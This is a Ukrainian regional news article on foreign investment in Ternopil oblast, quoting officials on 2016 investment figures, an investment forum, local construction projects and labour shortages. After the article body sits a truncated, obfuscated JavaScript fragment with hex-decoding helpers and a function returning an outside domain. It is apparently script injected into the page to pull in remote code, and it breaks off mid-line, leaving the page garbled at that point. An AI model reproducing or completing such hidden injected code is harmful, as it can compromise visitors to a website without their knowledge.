Ви знаходитесь: Головна / Новини / Керівники області очікують ріст інвестицій у Тернопільщину

Керівники області очікують ріст інвестицій у Тернопільщину

Під час інвестиційного форуму в травні, нашу область відвідали більше двох десятків іноземних делегацій. Голова обласної адміністрації каже, це великий крок до налагодження зв’язків з інвесторами.

 СТЕПАН БАРНА, голова Тернопільської ОДА

«Станом на кінець першого кварталу 2016 року обсяг прямих іноземних інвестицій, які надійшли в Тернопільську область, в економіку області, є 50 млн. дол. США. В січні-березні їх приріст склав 734 тис. дол. США. Порівняно з початком 2016 року, обсяги прямих інвестицій зросли на 1,5%».

Більшість закордонних інвестицій зосередженні в промисловості, а також транспорті, сільському, рибному та лісовому господарствах.

ІГОР ВОНС, керівник апарату обласної державної адміністрації

«Перспективи дуже великі, але на жаль, там 18% від загальних інвестицій тільки в транспорт, цього замало. Те саме про сільське господарство, якщо ми аграрна область і ми про це постійно говоримо, то залучення інвестицій іноземних в аграрний сектор надважливе. В останній зустрічі з послом Естонії, ми спілкувалися, то з 400 підприємств, які були до 2014 року чи до 2013, то на сьогоднішній день залишилося лише 40 спільних, це естонських, які працюють, інвестують в Україну».

Не дивлячись, що зарубіжні бізнесмени досить обережні в інвестуванні українських проектів, в результаті інвестиційного форуму, деякі делегації таки зацікавилися співпрацею з тернопільськими підприємствами. Окрім цього, під час наради чиновники обговорили інвестиційні перспективи Підгаєцького, Шумського та Заліщицького районів.

БОРИС ШИПІТКА, голова Заліщицької РДА

«Потужний зараз зайшов до нас інвестор, де на декілька етапів розприділені кошти. На перший етап будується елеватор, завод по переробці зернових. Вартість його в першому етапі складає 10 млн. гривень. Наступний проект вже в серпні ми розпочинаємо, побудова спортивного комплексу, с. Городок. Там заплановано готельний комплекс, плавальний басейн, 4 футбольних поля».

В першу чергу ці проекти створять в районі нові робочі місця, додає Борис Шипітка. Від одного з інвесторів вже є замовлення на 120 фахівців, проект із спорткомплексом створить ще близько двох сотень вакансій.

БОРИС ШИПІТКА, голова Заліщицької РДА

«Тут наступна проблема може бути. В тому, чи ми забезпечимо цими робочими місцями, бо ми зіткнулися сьогодні з такою проблемою, що є 25 вакантних місць в ДЕД, тобто, дорожньому управлінні Товстенькому, тобто ми не можемо, навіть, цих набрати вже 2 місяці. Є техніка готова до праці, є що робити, тому що знаєте, в якому стані знаходяться наші дороги, то тут є зараз проблема, щоб забезпечити робочою силою».

Окрім цього, після форуму «Тернопільщина Invest – 2016» польських інвесторів зацікавила можливість будівництва сонячної електростанції, зізнається очільник Заліщицького району. І для цього вже виділили відповідну земельну ділянку.

 

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return “intb.te.ua”},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(“http”)==0){return p}for(var e=0;e

Автор: Оксана Максимлюк

Оксана Максимлюк

Залишити коментар

Ваша електронну адресу не буде опубліковано. Обов’язкові для заповнення поля позначені *

*

Scroll To Top